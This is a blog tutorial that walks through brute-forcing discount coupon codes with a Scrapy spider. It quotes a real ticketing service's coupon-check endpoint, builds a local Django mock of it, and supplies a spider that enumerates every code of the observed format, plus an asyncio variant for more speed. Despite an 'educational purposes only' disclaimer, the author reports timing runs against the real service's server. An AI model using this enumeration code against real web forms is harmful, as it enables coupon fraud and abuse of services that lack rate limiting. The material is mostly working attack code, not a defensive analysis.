Brute Forcing Forms with Scrapy
I recently had the opportunity to attend Web Summit with my team as a startup. If you don't already know, Web Summit's Alpha package gives you a great deal: 3 people from your team for a very low price. As a team of 8, I decided to send them and request one more of these packages, which came with a per-ticket discount available to Alpha exhibitors for a short time. Annnnd I missed the deadline. So I tried to find every possible way to get a discount and bring my whole team to the biggest tech event in the world. As far as I could see from the Web Summit ticket service, the coupon check worked like this: you typed your code, hit submit, an Ajax request was generated, and an Ajax response came back. That is nice. And no security like CSRF tokens in my way. The request looked like this:
https://ti.to/websummit/2017-web-summit/iframe?discount_code=LTSW12343l&release_ids=398oawcyg90&398oawcyg90=1&source=
so it was easy for me to make different "ajax" requests with unique codes and get a response back. The response was a JSON object with HTML code inside the "view" key. The trick for detecting whether a coupon was valid was the absence of the keyword "unavailable". So now let's break it down and start brute-forcing.
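To make that concrete, here is a minimal sketch of the kind of probe I had in mind, using the Python requests library. It assumes the response really is JSON with the rendered HTML under a "view" key, as described above; the coupon code is just the sample one from the URL.
import requests

url = ("https://ti.to/websummit/2017-web-summit/iframe"
       "?discount_code=LTSW12343l&release_ids=398oawcyg90&398oawcyg90=1&source=")
response = requests.get(url)
# a valid coupon is one whose rendered view does NOT contain "unavailable"
if "unavailable" not in response.json().get("view", ""):
    print("This coupon looks valid!")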
Get your hands dirty
Start by creating a virtual environment and installing Scrapy and Django with pip.
mkvirtualenv -p python3 ScrapyBruteForce
cd Desktop/
mkdir ScrapyBruteForce
pip install scrapy
pip install django
cd ScrapyBruteForce
I installed Django so we can attack our own local server, since this post is for educational purposes only. And we should never, ever try to hack anything we don't own.
Django Server Creation
Now you will ask me: why Django? To simulate the Ajax calls we saw earlier at the Web Summit ticket service. If you are familiar with Django, skip this part or feel free to clone my GitHub repo and start playing now, or go directly to the Scrapy part. For anyone familiar with Ajax and Django this is going to be just a few lines of code: a simple form with the coupon as input, and when the submit button is pressed an Ajax call is triggered. If the response is positive, the keyword "unavailable" will not appear in it. To begin, we have to initialise a Django project.
django-admin startproject WebSummitTicketing
cd WebSummitTicketing/
django-admin startapp Bruteforce
And now your Django project tree should look like this.
.
├── Bruteforce
│ ├── __init__.py
│ ├── admin.py
│ ├── apps.py
│ ├── migrations
│ │ └── __init__.py
│ ├── models.py
│ ├── tests.py
│ └── views.py
├── WebSummitTicketing
│ ├── __init__.py
│ ├── settings.py
│ ├── urls.py
│ └── wsgi.py
└── manage.py
Django follows the MVC pattern (in its own MTV flavour), so we have to define a URL for our index.html first and then a URL for the Ajax calls.
So open urls.py with your favourite text editor, fill urlpatterns with the following, and then open views.py to handle the views.
from django.conf.urls import url
from django.contrib import admin
from Bruteforce import views

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^$', views.home, name='home'),
    url(r'^ajax/coupon/', views.ajax, name='ajax'),
]
from django.http import JsonResponse
from django.shortcuts import render

def home(request):
    return render(request, 'index.html')
Now, in order for Django to find that index.html file, we first have to add our Bruteforce app to INSTALLED_APPS in settings.py. It should now look like this.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'Bruteforce',
]
And we have to create a folder named templates inside the Bruteforce directory. This is where Django will look for our HTML files. Now create the index.html file inside that folder and place this code in it.
<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
<form>
  {% csrf_token %}
  <input id="coupon" type="text" name="coupon">
  <!-- type="button" keeps the browser from submitting the form and
       reloading the page; the Ajax call below does the work instead -->
  <button id="submit" type="button">Check</button>
</form>
<script
  src="https://code.jquery.com/jquery-1.12.4.min.js"
  integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
  crossorigin="anonymous"></script>
<script>
$("#submit").click(function() {
  var form = $(this).closest("form");
  $.ajax({
    type: "POST",
    url: '/ajax/coupon/',
    // serialize() includes the csrfmiddlewaretoken field,
    // so Django's CSRF check passes
    data: form.serialize(),
    dataType: 'json',
    success: function (data) {
      console.log(data.success);
    }
  });
});
</script>
</body>
</html>
Remember, without the CSRF token Django will not let you make a POST Ajax request. And I don't blame it; web safety is one of the top priorities nowadays. Now, as we saw earlier, the real service returned the response as HTML code inside the JSON key "view", but here we are going to return plain JSON with the key "success", for the sake of simplicity. One more step before we start penetrating: we have to write the view function that handles the Ajax requests.
def ajax(request):
    # the browser form POSTs a "coupon" field, while our curl tests and the
    # spider use GET with a "code" parameter, so accept the code from either
    code = request.GET.get('code') or request.POST.get('coupon')
    if code == "LWFD12334m":
        data = {
            'success': 'available'
        }
    else:
        data = {
            'success': 'unavailable'
        }
    return JsonResponse(data)
As we can see from the code, our server receives requests in the format http://localhost:8000/ajax/coupon/?code=********. We extract the code value and check whether it is the right one: the view returns a JSON object whose success key is "available" if the code is correct and "unavailable" otherwise. Now run the server and, in another terminal, make a request to see the response.
python manage.py runserver
#### In another terminal #####
curl "http://localhost:8000/ajax/coupon/?code=LWFD12334m"
curl "http://localhost:8000/ajax/coupon/?code=WFAS2412w"
With the first request you should get the response {"success": "available"},
while with the second request you should get {"success": "unavailable"}
as a response. So we are now ready to start writing our penetration script and get that coupon code we always wanted.
I am also curious to find out whether my assumption was right and Scrapy really was one of the finest solutions to my problem. To check it, I will write a simple Python script that makes the requests with the requests library, then I will implement the same thing as a Scrapy spider and compare the results.
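For the plain-Python side of that comparison, a minimal timing sketch like this one is enough; the candidate code here is a dummy value, since we only care about request throughput against our local server.
import time
import requests

start = time.perf_counter()
for _ in range(1000):
    # any wrong code will do, we are only measuring speed
    requests.get("http://127.0.0.1:8000/ajax/coupon/?code=AAAA00000a")
print("1000 requests in {:.2f} seconds".format(time.perf_counter() - start))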
Scrapy pen tool
Now stop the server if it is still running, go back to the root of the project, and initialise your Scrapy project. Then go inside the spiders folder and create a file named PenTool.py.
scrapy startproject PenTool
cd PenTool/PenTool/spiders/ && touch PenTool.py
And your project's tree should look like this.
.
├── PenTool
│ ├── __init__.py
│ ├── __pycache__
│ ├── items.py
│ ├── middlewares.py
│ ├── pipelines.py
│ ├── settings.py
│ └── spiders
│ ├── PenTool.py
│ ├── __init__.py
│ └── __pycache__
└── scrapy.cfg
Open your PenTool.py and start writing our little brute-forcing spider.
import string
from itertools import product

import scrapy
from scrapy.exceptions import CloseSpider

class MySpider(scrapy.Spider):
    name = "WebSummit"

    def start_requests(self):
        # the coupon format is 4 upper-case letters, 5 digits and a
        # lower-case letter, so we need product() (draws with repetition
        # and order), not combinations()
        for x in product(string.ascii_uppercase, repeat=4):
            up = ''.join(x)
            for y in product(string.digits, repeat=5):
                dig = ''.join(y)
                for low in string.ascii_lowercase:
                    url = "http://127.0.0.1:8000/ajax/coupon/?code={}{}{}".format(up, dig, low)
                    yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        if "unavailable" in response.text:
            return
        raise CloseSpider('Code Found: {}'.format(response.url))
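To unleash the spider, run it from inside the Scrapy project with the standard crawl command:
scrapy crawl WebSummit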
As we saw at the beginning of the article, the coupon had a format of 4 upper-case letters, 5 digits in a row, and then a lower-case letter. That means 26^4 x 10^5 x 26 = 1.1881376e+12 combinations. Those are a lot of combinations, so let's estimate the worst-case scenario. Modifying the code a little to run a "speed" test, I saw that Scrapy handled 1000 requests against localhost in 6.96 seconds. Not bad. Not bad at all. That means about 143.6 requests per second, or roughly 0.00696 seconds per request. For our case that would mean about 8.27e+9 seconds, or roughly 262 years, to complete. With the Python requests library that time fell to 4.8 seconds, and I was starting to think that Scrapy had lost the battle on the localhost server.
But is that it? I went and tested in a real environment, again with just 1000 requests. With the requests library the results were absolutely horrible: many minutes to complete, not even worth waiting for. Then I tested with Scrapy, and the result was 15.75 seconds for 1000 requests. That's what I wanted to see; Scrapy won this battle with ease. The results were just as bad with urllib. If you want to get your hands even dirtier, giving the asyncio library a try could save you more time: as Paweł Miech wrote in his article, with asyncio Python can achieve around 111,111 requests in one minute, compared with the roughly 4000 requests per minute Scrapy achieved against WebSummit's server. Using Scrapy only as a web crawler means turning your back on the pretty nice features it has for handling requests concurrently without us getting our hands dirty. And brute-forcing is one of them.
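For reference, here is a minimal concurrent sketch in the spirit of Paweł Miech's approach. It assumes the aiohttp library and Python 3.7+, and fires a small batch of candidate codes at our local server at once, checking each body for the keyword; one of the sample codes is the valid one, so it should actually print a hit.
import asyncio
import string
import aiohttp

async def check(session, code):
    url = "http://127.0.0.1:8000/ajax/coupon/?code={}".format(code)
    async with session.get(url) as response:
        body = await response.text()
        if "unavailable" not in body:
            print("Code found:", code)

async def main():
    # a small sample batch, just to demonstrate the concurrency
    codes = ["LWFD12334" + c for c in string.ascii_lowercase]
    async with aiohttp.ClientSession() as session:
        await asyncio.gather(*(check(session, code) for code in codes))

asyncio.run(main())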